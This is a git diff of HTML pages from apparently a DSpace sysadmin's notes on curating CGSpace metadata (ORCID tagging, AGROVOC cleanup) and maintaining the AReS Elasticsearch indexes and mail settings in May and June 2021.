                                                                                                                                                                                                                                                                                                                                                                                                    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/new | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-05-18-combined.txt
                                                                                                                                                                                                                                                                                                                                                                                                    +$ ./ilri/resolve-orcids.py -i /tmp/2021-05-18-combined.txt -o /tmp/2021-05-18-combined-names.txt
                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                    • I sorted the names and added the XML formatting in vim, then ran it through tidy:
                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                    $ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/cg-creator-identifier.xml
                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                      $ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/cg-creator-identifier.xml
                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                      • Tag fifty-five items from the Alliance’s new authors with ORCID iDs using add-orcid-identifiers-csv.py:
                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                      $ cat 2021-05-18-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                                      -dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                      -"Urioste Daza, Sergio",Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
                                                                                                                                                                                                                                                                                                                                                                                                      -"Urioste, Sergio",Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
                                                                                                                                                                                                                                                                                                                                                                                                      -"Villegas, Daniel",Daniel M. Villegas: 0000-0001-6801-3332
                                                                                                                                                                                                                                                                                                                                                                                                      -"Villegas, Daniel M.",Daniel M. Villegas: 0000-0001-6801-3332
                                                                                                                                                                                                                                                                                                                                                                                                      -"Giles, James",James Giles: 0000-0003-1899-9206
                                                                                                                                                                                                                                                                                                                                                                                                      -"Simbare,  Alice",Alice Simbare: 0000-0003-2389-0969
                                                                                                                                                                                                                                                                                                                                                                                                      -"Simbare, Alice",Alice Simbare: 0000-0003-2389-0969
                                                                                                                                                                                                                                                                                                                                                                                                      -"Simbare, A.",Alice Simbare: 0000-0003-2389-0969
                                                                                                                                                                                                                                                                                                                                                                                                      -"Dita Rodriguez, Miguel",Miguel Angel Dita Rodriguez: 0000-0002-0496-4267
                                                                                                                                                                                                                                                                                                                                                                                                      -"Templer, Noel",Noel Templer: 0000-0002-3201-9043
                                                                                                                                                                                                                                                                                                                                                                                                      -"Jalonen, R.",Riina Jalonen: 0000-0003-1669-9138
                                                                                                                                                                                                                                                                                                                                                                                                      -"Jalonen, Riina",Riina Jalonen: 0000-0003-1669-9138
                                                                                                                                                                                                                                                                                                                                                                                                      -"Izquierdo, Paulo",Paulo Izquierdo: 0000-0002-2153-0655
                                                                                                                                                                                                                                                                                                                                                                                                      -"Reyes, Byron",Byron Reyes: 0000-0003-2672-9636
                                                                                                                                                                                                                                                                                                                                                                                                      -"Reyes, Byron A.",Byron Reyes: 0000-0003-2672-9636
                                                                                                                                                                                                                                                                                                                                                                                                      -$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-05-18-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                        $ cat 2021-05-18-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                                        +dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                        +"Urioste Daza, Sergio",Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
                                                                                                                                                                                                                                                                                                                                                                                                        +"Urioste, Sergio",Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
                                                                                                                                                                                                                                                                                                                                                                                                        +"Villegas, Daniel",Daniel M. Villegas: 0000-0001-6801-3332
                                                                                                                                                                                                                                                                                                                                                                                                        +"Villegas, Daniel M.",Daniel M. Villegas: 0000-0001-6801-3332
                                                                                                                                                                                                                                                                                                                                                                                                        +"Giles, James",James Giles: 0000-0003-1899-9206
                                                                                                                                                                                                                                                                                                                                                                                                        +"Simbare,  Alice",Alice Simbare: 0000-0003-2389-0969
                                                                                                                                                                                                                                                                                                                                                                                                        +"Simbare, Alice",Alice Simbare: 0000-0003-2389-0969
                                                                                                                                                                                                                                                                                                                                                                                                        +"Simbare, A.",Alice Simbare: 0000-0003-2389-0969
                                                                                                                                                                                                                                                                                                                                                                                                        +"Dita Rodriguez, Miguel",Miguel Angel Dita Rodriguez: 0000-0002-0496-4267
                                                                                                                                                                                                                                                                                                                                                                                                        +"Templer, Noel",Noel Templer: 0000-0002-3201-9043
                                                                                                                                                                                                                                                                                                                                                                                                        +"Jalonen, R.",Riina Jalonen: 0000-0003-1669-9138
                                                                                                                                                                                                                                                                                                                                                                                                        +"Jalonen, Riina",Riina Jalonen: 0000-0003-1669-9138
                                                                                                                                                                                                                                                                                                                                                                                                        +"Izquierdo, Paulo",Paulo Izquierdo: 0000-0002-2153-0655
                                                                                                                                                                                                                                                                                                                                                                                                        +"Reyes, Byron",Byron Reyes: 0000-0003-2672-9636
                                                                                                                                                                                                                                                                                                                                                                                                        +"Reyes, Byron A.",Byron Reyes: 0000-0003-2672-9636
                                                                                                                                                                                                                                                                                                                                                                                                        +$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-05-18-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                        • I deployed the latest 6_x-prod branch on CGSpace, ran all system updates, and rebooted the server
                                                                                                                                                                                                                                                                                                                                                                                                          • This included the IWMI changes, so I also migrated the cg.subject.iwmi metadata to dcterms.subject and deleted the subject term
                                                                                                                                                                                                                                                                                                                                                                                                          • @@ -504,9 +504,9 @@ $ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-05-18-add-orcids.csv -db dspa
                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                        dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
                                                                                                                                                                                                                                                                                                                                                                                                        -UPDATE 47405
                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                          dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
                                                                                                                                                                                                                                                                                                                                                                                                          +UPDATE 47405
                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                          • That’s interesting because we lowercased them all a few months ago, so these must all be new… wow
                                                                                                                                                                                                                                                                                                                                                                                                            • We have 405,000 total AGROVOC terms, with 20,600 of them being unique
                                                                                                                                                                                                                                                                                                                                                                                                            • @@ -518,12 +518,12 @@ UPDATE 47405
                                                                                                                                                                                                                                                                                                                                                                                                              • Export the top 5,000 AGROVOC terms to validate them:
                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                              localhost/dspace63= > \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY text_value ORDER BY count DESC LIMIT 5000) to /tmp/2021-05-20-agrovoc.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                              -COPY 5000
                                                                                                                                                                                                                                                                                                                                                                                                              -$ csvcut -c 1 /tmp/2021-05-20-agrovoc.csv| sed 1d > /tmp/2021-05-20-agrovoc.txt
                                                                                                                                                                                                                                                                                                                                                                                                              -$ ./ilri/agrovoc-lookup.py -i /tmp/2021-05-20-agrovoc.txt -o /tmp/2021-05-20-agrovoc-results.csv
                                                                                                                                                                                                                                                                                                                                                                                                              -$ csvgrep -c "number of matches" -r '^0$' /tmp/2021-05-20-agrovoc-results.csv > /tmp/2021-05-20-agrovoc-rejected.csv
                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY text_value ORDER BY count DESC LIMIT 5000) to /tmp/2021-05-20-agrovoc.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                +COPY 5000
                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvcut -c 1 /tmp/2021-05-20-agrovoc.csv| sed 1d > /tmp/2021-05-20-agrovoc.txt
                                                                                                                                                                                                                                                                                                                                                                                                                +$ ./ilri/agrovoc-lookup.py -i /tmp/2021-05-20-agrovoc.txt -o /tmp/2021-05-20-agrovoc-results.csv
                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvgrep -c "number of matches" -r '^0$' /tmp/2021-05-20-agrovoc-results.csv > /tmp/2021-05-20-agrovoc-rejected.csv
                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                • Meeting with Medha and Pythagoras about the FAIR Workflow tool
                                                                                                                                                                                                                                                                                                                                                                                                                  • Discussed the need for such a tool, other tools being developed, etc
                                                                                                                                                                                                                                                                                                                                                                                                                  • @@ -545,54 +545,54 @@ $ csvgrep -c "number of matches" -r <
                                                                                                                                                                                                                                                                                                                                                                                                                    • Add ORCID identifiers for missing ILRI authors and tag 550 others based on a few authors I noticed that were missing them:
                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                    $ cat 2021-05-24-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                                                    -dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Patel, Ekta","Ekta Patel: 0000-0001-9400-6988"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Dessie, Tadelle","Tadelle Dessie: 0000-0002-1630-0417"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Tadelle, D.","Tadelle Dessie: 0000-0002-1630-0417"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Dione, Michel M.","Michel Dione: 0000-0001-7812-5776"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Kiara, Henry K.","Henry Kiara: 0000-0001-9578-1636"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Naessens, Jan","Jan Naessens: 0000-0002-7075-9915"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Steinaa, Lucilla","Lucilla Steinaa: 0000-0003-3691-3971"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Wieland, Barbara","Barbara Wieland: 0000-0003-4020-9186"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Grace, Delia","Delia Grace: 0000-0002-0195-9489"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Rao, Idupulapati M.","Idupulapati M. Rao: 0000-0002-8381-9358"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Cardoso Arango, Juan Andrés","Juan Andrés Cardoso Arango: 0000-0002-0252-4655"
                                                                                                                                                                                                                                                                                                                                                                                                                    -$ ./ilri/add-orcid-identifiers-csv.py -i 2021-05-24-add-orcids.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                      $ cat 2021-05-24-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                                                      +dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Patel, Ekta","Ekta Patel: 0000-0001-9400-6988"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Dessie, Tadelle","Tadelle Dessie: 0000-0002-1630-0417"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Tadelle, D.","Tadelle Dessie: 0000-0002-1630-0417"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Dione, Michel M.","Michel Dione: 0000-0001-7812-5776"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Kiara, Henry K.","Henry Kiara: 0000-0001-9578-1636"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Naessens, Jan","Jan Naessens: 0000-0002-7075-9915"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Steinaa, Lucilla","Lucilla Steinaa: 0000-0003-3691-3971"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Wieland, Barbara","Barbara Wieland: 0000-0003-4020-9186"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Grace, Delia","Delia Grace: 0000-0002-0195-9489"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Rao, Idupulapati M.","Idupulapati M. Rao: 0000-0002-8381-9358"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Cardoso Arango, Juan Andrés","Juan Andrés Cardoso Arango: 0000-0002-0252-4655"
                                                                                                                                                                                                                                                                                                                                                                                                                      +$ ./ilri/add-orcid-identifiers-csv.py -i 2021-05-24-add-orcids.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                      • A few days ago I took a backup of the Elasticsearch indexes on AReS using elasticdump:
                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                      $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                                                      -$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                        $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                                                        +$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                        • The indexes look OK so I started a harvesting on AReS

                                                                                                                                                                                                                                                                                                                                                                                                                        2021-05-25

                                                                                                                                                                                                                                                                                                                                                                                                                        • The AReS harvest got messed up somehow, as I see the number of items in the indexes are the same as before the harvesting:
                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                        $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items                                                
                                                                                                                                                                                                                                                                                                                                                                                                                        -yellow open openrxv-items-temp       o3ijJLcyTtGMOPeWpAJiVA 1 1 104373 106455 491.5mb 491.5mb
                                                                                                                                                                                                                                                                                                                                                                                                                        -yellow open openrxv-items-final      soEzAnp3TDClIGZbmVyEIw 1 1    953      0   2.3mb   2.3mb
                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                          $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items                                                
                                                                                                                                                                                                                                                                                                                                                                                                                          +yellow open openrxv-items-temp       o3ijJLcyTtGMOPeWpAJiVA 1 1 104373 106455 491.5mb 491.5mb
                                                                                                                                                                                                                                                                                                                                                                                                                          +yellow open openrxv-items-final      soEzAnp3TDClIGZbmVyEIw 1 1    953      0   2.3mb   2.3mb
                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                          • Update all docker images on the AReS server (linode20):
                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                          $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                          -$ docker-compose -f docker/docker-compose.yml down
                                                                                                                                                                                                                                                                                                                                                                                                                          -$ docker-compose -f docker/docker-compose.yml build
                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                            $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                            +$ docker-compose -f docker/docker-compose.yml down
                                                                                                                                                                                                                                                                                                                                                                                                                            +$ docker-compose -f docker/docker-compose.yml build
                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                            • Then run all system updates on the server and reboot it
                                                                                                                                                                                                                                                                                                                                                                                                                            • Oh crap, I deleted everything on AReS and restored the backup and the total items are now 104317… so it was actually correct before!
                                                                                                                                                                                                                                                                                                                                                                                                                            • For reference, this is how I re-created everything:
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                            -curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                            -curl -XPUT 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                            -curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                            -curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                                                                                                            -elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                                                            -elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                              +curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                              +curl -XPUT 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                              +curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                              +curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                                                                                                              +elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                                                              +elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              • I will just start a new harvest… sigh

                                                                                                                                                                                                                                                                                                                                                                                                                              2021-05-26

                                                                                                                                                                                                                                                                                                                                                                                                                              @@ -605,8 +605,8 @@ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhos
                                                                                                                                                                                                                                                                                                                                                                                                                            • Looking in the DSpace log for this morning I see a big hole in the logs at that time (UTC+2 server time):
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            2021-05-26 02:17:52,808 INFO  org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/70659 with status: 2. Result: '10568/70659: item has country codes, skipping'
                                                                                                                                                                                                                                                                                                                                                                                                                            -2021-05-26 02:17:52,853 INFO  org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/66761 with status: 2. Result: '10568/66761: item has country codes, skipping'
                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                            2021-05-26 02:17:52,808 INFO  org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/70659 with status: 2. Result: '10568/70659: item has country codes, skipping'
                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-05-26 02:17:52,853 INFO  org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/66761 with status: 2. Result: '10568/66761: item has country codes, skipping'
                                                                                                                                                                                                                                                                                                                                                                                                                             2021-05-26 03:00:05,772 INFO  org.dspace.statistics.SolrLoggerServiceImpl @ solr-statistics.spidersfile:null
                                                                                                                                                                                                                                                                                                                                                                                                                             2021-05-26 03:00:05,773 INFO  org.dspace.statistics.SolrLoggerServiceImpl @ solr-statistics.server:http://localhost:8081/solr/statistics
                                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                                              @@ -638,18 +638,18 @@ May 26, 02:57 UTC
                                                                                                                                                                                                                                                                                                                                                                                                                            • And indeed the email seems to be broken:
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            $ dspace test-email
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            -About to send test email:
                                                                                                                                                                                                                                                                                                                                                                                                                            - - To: fuuuuuu
                                                                                                                                                                                                                                                                                                                                                                                                                            - - Subject: DSpace test email
                                                                                                                                                                                                                                                                                                                                                                                                                            - - Server: smtp.office365.com
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            -Error sending email:
                                                                                                                                                                                                                                                                                                                                                                                                                            - - Error: javax.mail.SendFailedException: Send failure (javax.mail.MessagingException: Could not convert socket to TLS (javax.net.ssl.SSLHandshakeException: No appropriate protocol (protocol is disabled or cipher suites are inappropriate)))
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            -Please see the DSpace documentation for assistance.
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ dspace test-email
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +About to send test email:
                                                                                                                                                                                                                                                                                                                                                                                                                              + - To: fuuuuuu
                                                                                                                                                                                                                                                                                                                                                                                                                              + - Subject: DSpace test email
                                                                                                                                                                                                                                                                                                                                                                                                                              + - Server: smtp.office365.com
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +Error sending email:
                                                                                                                                                                                                                                                                                                                                                                                                                              + - Error: javax.mail.SendFailedException: Send failure (javax.mail.MessagingException: Could not convert socket to TLS (javax.net.ssl.SSLHandshakeException: No appropriate protocol (protocol is disabled or cipher suites are inappropriate)))
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +Please see the DSpace documentation for assistance.
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              • I saw a recent thread on the dspace-tech mailing list about this that makes me wonder if Microsoft changed something on Office 365
                                                                                                                                                                                                                                                                                                                                                                                                                                • I added mail.smtp.ssl.protocols=TLSv1.2 to the mail.extraproperties in dspace.cfg and the test email sent successfully
                                                                                                                                                                                                                                                                                                                                                                                                                                • diff --git a/docs/2021-06/index.html b/docs/2021-06/index.html index fa96c5448..a216114dc 100644 --- a/docs/2021-06/index.html +++ b/docs/2021-06/index.html @@ -36,7 +36,7 @@ I simply started it and AReS was running again: "/> - + @@ -132,8 +132,8 @@ I simply started it and AReS was running again:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ docker-compose -f docker/docker-compose.yml start angular_nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ docker-compose -f docker/docker-compose.yml start angular_nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                • Margarita from CCAFS emailed me to say that workflow alerts haven’t been working lately
                                                                                                                                                                                                                                                                                                                                                                                                                                  • I guess this is related to the SMTP issues last week
                                                                                                                                                                                                                                                                                                                                                                                                                                  • @@ -162,14 +162,14 @@ I simply started it and AReS was running again:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • The Elasticsearch indexes are messed up so I dumped and re-created them correctly:
                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                    curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                                    -curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                                    -curl -XPUT 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                                    -curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                                    -curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                                                                                                                    -elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                                                                    -elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                                      +curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                                      +curl -XPUT 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                                      +curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                                      +curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                                                                                                                      +elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                                                                      +elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Then I started a harvesting on AReS

                                                                                                                                                                                                                                                                                                                                                                                                                                      2021-06-07

                                                                                                                                                                                                                                                                                                                                                                                                                                      @@ -208,8 +208,8 @@ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhos
                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                  $ podman unshare chown 1000:1000 /home/aorth/.local/share/containers/storage/volumes/docker_esData_7/_data
                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                    $ podman unshare chown 1000:1000 /home/aorth/.local/share/containers/storage/volumes/docker_esData_7/_data
                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                    • The new OpenRXV harvesting method by Moayad uses pages of 10 items instead of 100 and it’s much faster
                                                                                                                                                                                                                                                                                                                                                                                                                                      • I harvested 90,000+ items from DSpace Test in ~3 hours
                                                                                                                                                                                                                                                                                                                                                                                                                                      • @@ -231,23 +231,23 @@ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhos
                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                    $ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                    -90459
                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                    -90380
                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | sort | uniq -c | sort -h
                                                                                                                                                                                                                                                                                                                                                                                                                                    -...
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      2 "10568/99409"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      2 "10568/99410"
